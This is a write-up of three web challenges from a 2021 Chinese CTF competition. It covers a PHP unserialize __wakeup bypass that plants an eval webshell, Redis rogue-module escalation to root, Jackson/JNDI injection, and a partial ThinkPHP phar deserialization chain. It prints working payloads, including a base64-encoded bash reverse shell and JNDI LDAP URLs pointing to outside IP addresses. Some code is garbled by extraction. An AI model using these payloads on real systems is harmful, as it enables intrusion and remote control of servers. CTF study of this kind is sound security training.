Title: 2021 Second "Tianyi Cup" Network Security Offensive and Defensive Competition Writeup

Web

1.esay_eval

?php class A{ public $code=''; function __call($method,$args){ eval($this-code); } function __wakeup(){ $this-code=''; } } class B{ function __destruct(){ echo $this-a-a(); } } if(isset($_REQUEST['poc'])){ preg_match_all('/'[BA]':(.*?):/s',$_REQUEST['poc'],$ret); if (isset($ret[1])) { foreach ($ret[1] as $i) { if(intval($i)!==1){ exit('you want to bypass wakeup ? no !'); } } unserialize($_REQUEST['poc']); } }else{ highlight_file(__FILE__); }

A brief analysis can be done bypassing the __wakeup function.

Read this article about the function preg_match_all php preg_match_all() function introduction and usage - Feiniao Muyu Blog (feiniaomy.com)

Finally, you need to make the two variables in $ret[1] equal to 1, because there is a limit of intval($i)!==1 after it (this is fine if you bypass it, because the variable names of php are case sensitive, and the function names, method names, and class names are not case sensitive.) Because you must bypass wakeup, use lowercase to prevent both preg_match_all from matching. Just put out one to bypass wakeup.

Construct payload

?php

class A{

public $code='';

public function __construct(){

$this-code='eval(\$_POST[1]);';

}

}

class B{

public function __construct(){

$this-a=new A();

}

}

echo serialize(new B());

$ is added before it because it is afraid that it will be executed when serialization is performed.

get O:1:'B':1:{s:1:'a';O:1:'A':1:{s:4:'code';s:19:'eval($_REQUEST[1]);';}}, change A to lowercase, You can modify the following number to bypass O:1:'B':1:{s:1:'a';O:1:'a':2:{s:4:'code';s:19:'eval($_REQUEST[1]);';}}, connect the ant sword to get the shell

Code audit, direct deserialization constructs a sentence Trojan

Lowercase object a bypass

payload

?poc=O:1:'B':1:{s:1:'a';O:1:'a':2:{s:4:'code';s:16:'eval($_POST[0]);';}} Ant Sword connection found that there is a disable_function. I tried the bypass brought by the ant Sword, and then found that there is config.php.swp vi-r in the root directory of the website. I found that the redis password is

Upload the malicious so file with redis rce on github to the tmp directory and then load the malicious module rce with the Ant Sword Redis plugin

Redis loads malicious so gets shell

Ant Sword found a config and restored it

Download it and throw it into Linux to restore it with Vi

vi -r config.php

This redis password looks too fake, but it's true. Use the redis plug-in of Ant Sword to connect

Then I hit Redis. I found that there is open_basedir in phpinfo. There is a tmp that can still be used, so I will upload the malicious so

https://github.com/Dliv3/redis-rogue-server

Use the ant sword directly

Connect redis using redis plugin

127.0.0.1:6379 module load /tmp/exppadding.so

OK

127.0.0.1:6379 system.exec 'id'

'uid=0(root) gid=0(root) groups=0(root)\n

Attached local environment":

FROM ubuntu:16.04

COPY src/sources.list /etc/apt/sources.listCOPY src/redis-4.0.9 /home/redis-4.0.9

RUN apt-get update \ apt-get install -y curl \ software-properties-common \ python3-software-properties \ python-software-properties \ unzip \ vim

RUN apt-get install -y apache2RUN service apache2 restart

RUN locale -aRUN export LANG=C.UTF-8 \ add-apt-repository ppa:ondrej/php \ apt-get update

RUN apt-get install -y libapache2-mod-php7.0\libzend-framework-php\php7.0-cli\php7.0\php7.0-bcmath\php7.0-bz2\php7.0-cgi\php7.0-common\php7.0-fpm\php7.0-gmp\php-http\php-imagick\php7.0-intl\php7.0-json\php7.0-mbstring\php-memcache\php-memcached\php7.0-mysql\ php7.0-recode\php7.0-gd\php7.0-mcrypt\php7.0-xml\php7.0-pdo\php7.0-opcache\php7.0-curl\php7.0-zip

RUN apt install -y gcc \ make

RUN cd /home/redis-4.0.9 \ cp -r /home/redis-4.0.9 /usr/local/redis \ cd /usr/local/redis \ make make PREFIX=/usr/local/redis install \ export REDIS_HOME=/usr/local/redis \ export PATH=$PATH:$REDIS_HOME/bin

COPY src /tmp/srcRUN mv /tmp/src/web.ini /etc/php/7.0/apache2/conf.d/php.ini \rm -rf /var/www/html \mv /tmp/src/html /var/www/html \mv /tmp/src/start.sh /start.sh \chmod +x /start.sh

EXPOSE 80

CMD ['/start.sh']

Among them, web.ini is the configuration file of php, which can be set to disable_function, etc.

2.jackson

I won’t talk about the original title

https://www.redmango.top/article/61#javaweb

First look at the pom.xml given by the title

There is shiro1.5.1, cc3.2.1 title is jackson

Then it should be shiro verification to bypass access routes and deserialize the CC chain through jackson

I found that there is a json route that needs to be logged in /;/json bypassed

Then go to the tool directly: https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A '47.100.27.114' -C 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDAuMjcuMTE0LzgwODggMD4mMQ==}|{base64,-d}|{bash,-i}' Or if you see the framework version in pom.xml, you can think of CVE-2020-1957

jackson deserialization + JNDI injection + LDAP return serialized data trigger local Gadget Bypass jdk 8u_191 limit 4

POST /;/json HTTP/1.1

Host: 8.134.37.86:20947

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: application/json

Content-Length: 97

['ch.qos.logback.core.db.JNDIConnectionSource',{'jndiLocation':'ldap://106.15.250.209:8091/a

bc'}]

Nc has rebounded, just get the flag in the root directory

3.ezTP

Get the www.zip source code through robots.txt:

Directory structure:

The obvious TP framework is viewed and gets: 5.0.10

At the beginning, I tried RCE of the TP framework, but it was fruitless. So give up

Then check that the Controller has an index and admin:

Admin controller:

Index controller:

It seems like there is no problem.

However, you can see that you must log in to admin to upload and column directory operations in the admin controller

Therefore, it must be injected, Baidu searched

TP framework injection for this version: https://www.cnblogs.com/wangtanzhi/p/12734685.html

Inject login admin account:

Then check the listdir of the admin controller and you can find that the is_dir function can trigger the deserialization of the phar.

Reference: https://www.anquanke.com/post/id/251318#h2-1

However, you will find that using the poc linked above is not available from the poc on the Internet.

I debugged the local environment and found that:

Process.php close method :

Unlike the original tp framework, an if is added to filter, because the original HasMany class does not have a close method, which makes it impossible to call the $this-processPipes-close() method, and the following deserialization and writing file RCE is impossible, so the POC on the Internet will be useless.

What you need to do now is to need a class with a close method, and internally need to call the close method of the member variable.

This allows filtering to be bypassed and deserialization can be continued.

Here I found the Memcache class,

Just connect the original chain to the $this-handler variable and you can continue to deserialize it.

But through debugging:

This path path cannot be found after writing it. So I changed it to the absolute path and wrote it to the public directory

Deserialize POC:

?phpnamespace think;use think\session\driver\Memcache;class Process{ private $processPipes;

private $status;

private $processInformation; public function __construct(){ $this-processInformation['running']=true; $this-status=3; $this-processPipes=(new Memcache(1)); }

}namespace think;class Model{

}namespace think\model;

use think\Model;class Merge extends Model{ public $a='1'; public function __construct(){ }}namespace think\model\relation;use think